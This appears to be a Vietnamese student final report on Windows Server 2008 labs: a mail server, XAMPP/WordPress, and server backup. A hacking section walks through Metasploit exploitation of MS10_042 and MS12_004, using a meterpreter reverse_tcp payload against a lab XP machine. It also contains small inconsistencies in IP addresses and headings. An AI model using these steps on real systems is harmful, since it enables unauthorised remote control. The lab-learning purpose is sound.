Điền các thông tin phù hợp với vị trí, ở đây là VietNam

Sau khi hoàn tất các bước trên, chọn "Next" để bắt đầu cài đặt.


Chờ đợi cho quá trình cài đặt hoàn tất.

Điền tên Domain chính xác ví dụ: phamthidiemkieu.vn


Điền địa chỉ DNS chính (Primary) và dự phòng (Backup)


Giữ nguyên lựa chọn "Setup MDaemon as a system service"

Bấm "Finish" để kết thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử dụng


Giao diện sau khi cài đặt thành công.


Tạo 1 tài khoảng mới vào Account New Account…

Nhập thông tin vào Email address và Email Password. Click OK để tạo tài khoảng Email.


Qua Win XP1 tạo Client 1……Ta vào Outlook Express.


Cấu hình Out Look mail để quán lý mail cho tài khoảng [email protected]. Nhập tên hiện thị vào Display name và click Next>Nhập địa chỉ Email và Click Next>

Nhập địa chỉ IP vào 2 ô Incoming và Outgoing và click Next.


Nhập tên tài khoảng và mật khẩu. Click Next

Click Finish để hoàn tất cấu hình quản lý mail cho tài khoảng test.

mailto:[email protected]


Qua Win XP 2 tạo Client 2.

Nhập địa chỉ E-mail


Trong cửa sổ Internet Connection Wizard điền thông tinTrong cửa sổ Internet Connection Wizard điền thông tin


Nhập Mail và Pass để đăng nhậpQua máy Xp1 đê gởi Mail cho Xp2

Qua Xp2 kiểm tra Mail,ta thấy nội dung mail như đã gởi


Tiếp tục việc gởi Mail ngược lại từ Xp2 cho Xp1

Kiểm tra Mail bên máy Xp1


Tiếp tục trên máy Xp1 gởi mail đến địa chỉ mail thật

4.2.2.2 Cài đặt và cấu hình Web Server trên VPSCài đặt và cấu hình Web Server trên VPS. XAMPP là một bộ công cụ lập trình PHP có thể cài đặt được trên nhiều

nền tảng khác nhau. Chữ X đầu tiên trong cụm từ XAMPP ám chỉ cross-platform nghĩa là XAMPP có thể chạy trên Windows, Linux, Mac OS, Solaris, còn các ký tự còn lại mang các ý nghĩa sau:

A = Apache, XAMPP bao gồm 1 Apache HTTP Server giúp chạy các ứng dụng web.M = MySQL, hệ quản trị cơ sở dữ liệu My SQL cũng được bao gồm trong XAMPP.P = PHP – ngôn ngữ lập trình PHP.P = Perl – ngôn ngữ lập trình Perl.Sau đây chúng ta cùng cài đặt và cấu hình Web Server bằng Xampp 1.7.3Chúng ta dowload và tiến hành cài đặt bằng fileBạn chọn ngôn ngữ cài đặt là English và nhấn OK để tiếp tục


Nhấn Next ở màn hình tiếp theo.

Theo mặc định XAMPP sẽ được cài đặt vào ổ C theo đường dẫn C:\xampp, bạn có thể nhấn Browse và chọn đường dẫn cài đặt khác

Nhấn chọn các service kèm theo XAMPP trong mục SERVICE SECTION sau đó nhấn Install để tiếp tục.


Màn hình hiển thị tiến độ cài đặt XAMPP hiện ra.

Quá trình cài đặt XAMPP hoàn tất, bạn nhấn vào nút Finish kết thúc.


XAMPP sẽ tự động cài đặt các service mà bạn đã chọn ở mục SERVICE SECTION bên trên, đầu tiên là Apache service.

Tiếp đó là MySQL service

Nhấn OK ở màn hình tiếp theo để bật XAMPP Control Panel.

Sau khi cài đặt xong các bạn click Start ở mục Apache và MySql trong XAMOO Control Panel Application.


Vào trình duyệt web và gõ vào localhost. Và chọn ngôn ngữ là English.

Sau khi chọn ngôn ngữ chúng ta và click pHp my admin.


Nhập tên cơ sở dữ liệu vào ô create new database và click Create để tạo database.

Và Databae đã được tạo.


vào đường dẫn cài đặt xampp\htdocs và copy mã nguồn wordpress mà chúng ta đã dowload trên internet.

Vào thư mục wordpress mà chúng ta vừa mới copy xong và tìm file wp-config-sample.php và mở nó lên bằng word pad.

Tìm và sửa thông tin lại như hình


Đổi tên file vừa sửa chửa thành wp-config.php

Vào đường dần localhost/wordpress/wp-admin/install.php. Sau đó điền các thông tin cần thiết.

Sau đó click Cài đặt WordPess


Cấu hình Wordpress thành công. Ta Clich Đăng Nhập

Màn hình sau khi đăng nhập thành công.


Ta vào Cài đặt Tổng Quan điền địa chỉ chúng ta muốn truy cập khi chúng ta lướt web vào 2 ô Wordpress address và Site Address.

Và đây là trang chủ của trang Web chúng ta khi vừa tạo xong.


4.2.3 Bảo mật WINDOWS

4.2.3.1 Khai thác mã lỗi MS10_042Đăng nhập bằng lệnh msfconsole

Khai thác mã lỗi MS10_042 bằng lệnh search ms10_042


Sử dụng lệnh use copy mã lỗi

Tiếp theo ta sẽ gõ lệnh show options để coi các thuộc tính thông tin của mã lỗi


Gõ Set srvhost -> Địa chỉ máy xp 192.168.232.129

Tiếp theo gõ set payload windowns/meterpreter/reverse_tcp


Set lhost -> Địa chỉ IP máy back track:192.168.232.129

Gõ lệnh exploit,để xuất hiện mã lỗi,sau đó coppy mã lỗi qua máy XP để khai thác mã lỗi


Chúng ta sẽ cho nạn nhân truy cập vào mã lỗi vừa tạo

Chúng ta sẽ thấy địa chỉ máy XP đang truy cập là 192.168.232.128


Gõ tiếp dòng lệnh Sessions,chúng ta sẽ thấy có một máy đang bị tấn công là máy XP có địa chỉ 192.168.232.128 thông qua bọt 1067

Tiếp tục dòng lệnh Sessions –i 1


Gõ getuid để coi tên máy nạn nhân

Như vậy việc khai thác mã lỗi đã thành công

4.2.3.2 Khai thác mã lỗi MS10_042Search mã lỗi bằng lệnh: Search ms12_004


Sau khi search mã lỗi ta dùng lệnh use sau đó coppy mã lỗi xuống


Tiếp theo gõ lệnh show options để xem các thuộc tính của mã lỗi.

Ta dùng lệnh Set srvhost-> Địa chỉ IP máy back track


Gõ tiếp lệnh Set payload windows/meterpreter/reverse_tcp

Set lhost-> Địa chỉ IP máy back track


->> Exploit để lấy địa chỉ máy tấn công

Sau khi lấy địa chỉ ta sẽ coppy địa chỉ mã lỗi vừa khai thác qua máy XPđể nạn nhân truy cập vào.


Sau khi nạn nhân truy cập,màn hình máy back track sẽ hiện tên user của người dung máy đó

Gõ Getuid


Gõ sysinfo

Như vậy ta đã khai thác thành công mã lỗi MS12_004


4.2.4 BACKUP WINDOWS SERVER 2008Mục đíchWindows server backup là một tính năng mới trên hệ điều hành Windows Server 2008 cung cấp chức năng lưu trữ (Backup), phục hồi dữ liệu (restore) và phục hồi hệ thống (Operating System Windows Recovery). Sẽ giúp cho người quản trị phục hồi nhanh chóng nếu hệ thống bị sự cố.I. Các nội dung chính- Cài đặt Windows Server Backup.- Backup Server.- Restore File và Folder.

II. Các bước thực hiện1. Cài đặt Windows Server BackupMở Administrator Tools Server Manager, click chuột phải Feature Add Feature.Cửa sổ Select Feature, bung Windows Server Backup Feature chọn Windows Server Backup Next.


Cửa sổ Comfirm Installation Selections, chọn Install. Sau khi cài đặt hoàn tất. Thì đóng cửa sổ lại.

2. Backup Full Server


Mở Administrative Tools Windows Server Backup, vào Action chọn Backup Once… Cửa sổ Backup options, kiểm tra chọn Different options, chọn Next.

Cửa sổ Select backup configuration, chọn Full Server, chọn Next.


Cửa sổ Select backup destination, trong ô Backup destination chọn ổ cứng để lưu trữ file backup Next.

Trong hộp thoại Windows Server Backup Yes cửa sổ specify advance option, chọn VSS copy backup Next Backup.


Quá trình Backup đang diễn ra.

Cửa sổ Backup progress, kiểm tra backup thành công Close.

Mở Windows Explore, vào ổ cứng lưu file backup kiểm tra các folder WindowsImageBackup ( folder lưu trữ các file backup).


3. Restore File và FolderMở Windows Explore, vào ổ C xóa một vài thư mục ( giả sử server bị mất dữ liệu).Mở Windows Server Backup trong Administrative Tools, vào Action Recover… cửa sổ Getting started, chọn This Server Next.

Cửa sổ Select backup date, chọn đúng ngày lưu trữ file backup Next cửa sổ Select item to recover, bung ổ đĩa chứa folder cần Restore Next cửa sổ Specify recovery options, giữ cấu hình mặc định Next cửa sổ Confirmation, chọn Recover cửa sổ Recovery progress, kiểm tra folder restore thành công Close.


Mở Windows Explorer, vào kiểm tra Restore được foder.Vậy là đã hoàn thành Windows Server Backup trên Windows Server 2008.


Kết LuậnNhững vấn đề đạt được: Cài đặt và cấu máy chủ Windows Server 2008 Cài đặt máy chủ quản trị miền Domain Controller Cấu hình máy chủ DHCP và DNS Cài đặt và cấu hình Mail Server trên Local và trên VPS Cài đặt và cấu hình Web Server trên Local Cài đặt và triển khai VPN Client to Site trên Local Sử dụng công cụ quản trị Server Manager trên Windows Server 2008 Tài khoản người dùng, tài khoản máy tính, nhóm và đơn vị tổ chức Quản trị môi trường làm việc người dùng, máy tính sử dụng chính sách nhóm Quản lý và cấp phép quyền truy cập tài nguyên Backup dữ liệu trên Windows Server 2008 Khai thác mã lỗi của System Hacking Cài đặt và cấu hình Web Server trên VPS

Hướng phát triển của đề tài: Nghiên cứu và triển khai mô hình VPN Site to Site trên Local Mở rộng và đưa ra kế hoạch bảo mật mạng và máy chủ Đảm bảo tính khả dụng và khai phục hệ thống sau thảm họa Cài đặt và cấu hình VPN Site to Site trên VPS


Phụ lụcTài liệu tham khảo: Tài liệu MCSA quản trị mạng trên Windows Server 2008 (Trung tâm Athena)Một số Website: http://www.athena.com.vn/ http://www.nhatnghe.com/ http://www.google.com/ http://www.youtube.com/

Sách tham khảo:- Tài liệu lab upgrade Windows 2008 trung tâm ATHENA - Tài liệu Lab 70-640, 70-642 ATHENAVà một số tài liệu khác trên internet


Link báo cáoPhạm Thị Diễm Kiều:

1. Clip giới thiệu cá nhân lần 1https://www.youtube.com/watch?v=egqPkv6g_Ro&hd=1https://www.youtube.com/watch?v=K7O2DUDgVWk&feature=autoshare&hd=1

2. Clip giới thệu cá nhân lần 2https://www.youtube.com/watch?v=K7O2DUDgVWk&feature=autoshare&hd=1

3. Web Server trên Local Hosthttps://www.youtube.com/watch?v=RfTIxdaz-to&hd=1

4. Lỗi MS12_004https://www.youtube.com/watch?v=sN3LIqJYkHo&feature=autoshare&hd=1

5. Mailserver trên Localhttps://www.youtube.com/watch?v=_i-lFItoA-E&hd=1

6. Mailsever trên VPShttps://www.youtube.com/watch?v=DfRvAKh2ZXc&feature=autoshare&hd=1

7. Lỗi MS10_042https://www.youtube.com/watch?v=B6rC9I-zhE0&feature=autoshare

8. Local & grouphttps://www.youtube.com/watch?v=00kGX7yvGwU&feature=autoshare&hd=1

9. Domainhttps://www.youtube.com/watch?v=R5hZBld8Z6c&feature=autoshare&hd=1

10. Local Security Policy https://www.youtube.com/watch?v=y325rgeVkYo&feature=autoshare&hd=1

11. DNShttps://www.youtube.com/watch?v=5N4V-HrnTj0&feature=autoshare&hd=1

12. DHCPhttps://www.youtube.com/watch?v=5ea2dfzqIq4&feature=autoshare&hd=1

Lý Ngọc Diệp:

1. Clip giới thiệu cá nhân lần 1https://www.youtube.com/watch?v=KYOxzlm5jlw

2. Clip giới thiệu cá nhân lần 2https://www.youtube.com/watch?v=RNyK9pxL7Js

http://www.youtube.com/

http://www.google.com/

http://www.nhatnghe.com/

http://www.athena.com.vn/


3. Slide Báo Cáo Cuối Kỳhttp://www.slideshare.net/LyND1473/bo-co-cui-k-34350320

4. Windows Server Backuphttps://www.youtube.com/watch?v=lz1xpoLRqsY

5. DHCPhttps://www.youtube.com/watch?v=AnmZGJR88TM&feature=youtu.be

6. DNS localhttps://www.youtube.com/watch?v=yN5a8L-zhXM&feature=youtu.be

7. Local Policyhttps://www.youtube.com/watch?v=1007li4xG9k&feature=youtu.be

8. Local Security Policyhttps://www.youtube.com/watch?v=LjuHSWdMA7Y&feature=youtu.be

9. Local User & Grouphttps://www.youtube.com/watch?v=BBmdJ_Uhlo8&feature=youtu.be

10. VPN Client To Sitehttps://www.youtube.com/watch?v=sH1030nuO2w&feature=youtu.be

Nguyễn Thị Tuyết

1. Clip giới thiệu cá nhân lần 1https://www.youtube.com/watch?v=DE2dAM6VGZ4

2. Clip giới thiệụ cá nhân lần 2https://www.youtube.com/watch?v=bizPXdWU_6o

3. Local user and grouphttps://www.youtube.com/watch?v=x8nQJiulQvY

4. Local security policyhttps://www.youtube.com/watch?v=2m2gnp8P17w

5. Local policyhttps://www.youtube.com/watch?v=aUv6MilcCpU

6. DHCPhttps://www.youtube.com/watch?v=FfFqXWpqBJ4

7. DNShttps://www.youtube.com/watch?v=UylMoNJ6KvQ

8. Web sever trên Localhttps://www.youtube.com/watch?v=eSVijar_7gI

9. VPN trên Localhttps://www.youtube.com/watch?v=TI1YwdHXBk4

10. Nâng cấp domainhttps://www.youtube.com/watch?v=m6D_0kGb9s8

https://www.youtube.com/watch?v=RNyK9pxL7Js

https://www.youtube.com/watch?v=KYOxzlm5jlw

https://www.youtube.com/watch?v=5ea2dfzqIq4&feature=autoshare&hd=1

https://www.youtube.com/watch?v=5ea2dfzqIq4&feature=autoshare&hd=1

https://www.youtube.com/watch?v=5N4V-HrnTj0&feature=autoshare&hd=1

https://www.youtube.com/watch?v=5N4V-HrnTj0&feature=autoshare&hd=1

https://www.youtube.com/watch?v=y325rgeVkYo&feature=autoshare&hd=1

https://www.youtube.com/watch?v=y325rgeVkYo&feature=autoshare&hd=1

https://www.youtube.com/watch?v=R5hZBld8Z6c&feature=autoshare&hd=1

https://www.youtube.com/watch?v=R5hZBld8Z6c&feature=autoshare&hd=1

https://www.youtube.com/watch?v=00kGX7yvGwU&feature=autoshare&hd=1

https://www.youtube.com/watch?v=00kGX7yvGwU&feature=autoshare&hd=1

https://www.youtube.com/watch?v=B6rC9I-zhE0&feature=autoshare

https://www.youtube.com/watch?v=DfRvAKh2ZXc&feature=autoshare&hd=1

https://www.youtube.com/watch?v=DfRvAKh2ZXc&feature=autoshare&hd=1

https://www.youtube.com/watch?v=_i-lFItoA-E&hd=1

https://www.youtube.com/watch?v=sN3LIqJYkHo&feature=autoshare&hd=1

https://www.youtube.com/watch?v=sN3LIqJYkHo&feature=autoshare&hd=1

https://www.youtube.com/watch?v=RfTIxdaz-to&hd=1

https://www.youtube.com/watch?v=K7O2DUDgVWk&feature=autoshare&hd=1




https://www.youtube.com/watch?v=egqPkv6g_Ro&hd=1

https://www.youtube.com/watch?v=m6D_0kGb9s8

https://www.youtube.com/watch?v=TI1YwdHXBk4

https://www.youtube.com/watch?v=eSVijar_7gI

https://www.youtube.com/watch?v=UylMoNJ6KvQ

https://www.youtube.com/watch?v=FfFqXWpqBJ4

https://www.youtube.com/watch?v=aUv6MilcCpU

https://www.youtube.com/watch?v=2m2gnp8P17w

https://www.youtube.com/watch?v=x8nQJiulQvY

https://www.youtube.com/watch?v=bizPXdWU_6o

https://www.youtube.com/watch?v=DE2dAM6VGZ4

https://www.youtube.com/watch?v=sH1030nuO2w&feature=youtu.be

https://www.youtube.com/watch?v=BBmdJ_Uhlo8&feature=youtu.be

https://www.youtube.com/watch?v=LjuHSWdMA7Y&feature=youtu.be

https://www.youtube.com/watch?v=1007li4xG9k&feature=youtu.be

https://www.youtube.com/watch?v=yN5a8L-zhXM&feature=youtu.be

https://www.youtube.com/watch?v=AnmZGJR88TM&feature=youtu.be

https://www.youtube.com/watch?v=lz1xpoLRqsY

http://www.slideshare.net/LyND1473/bo-co-cui-k-34350320

Baocaocuoiky athena

Documents

Transcript of Baocaocuoiky athena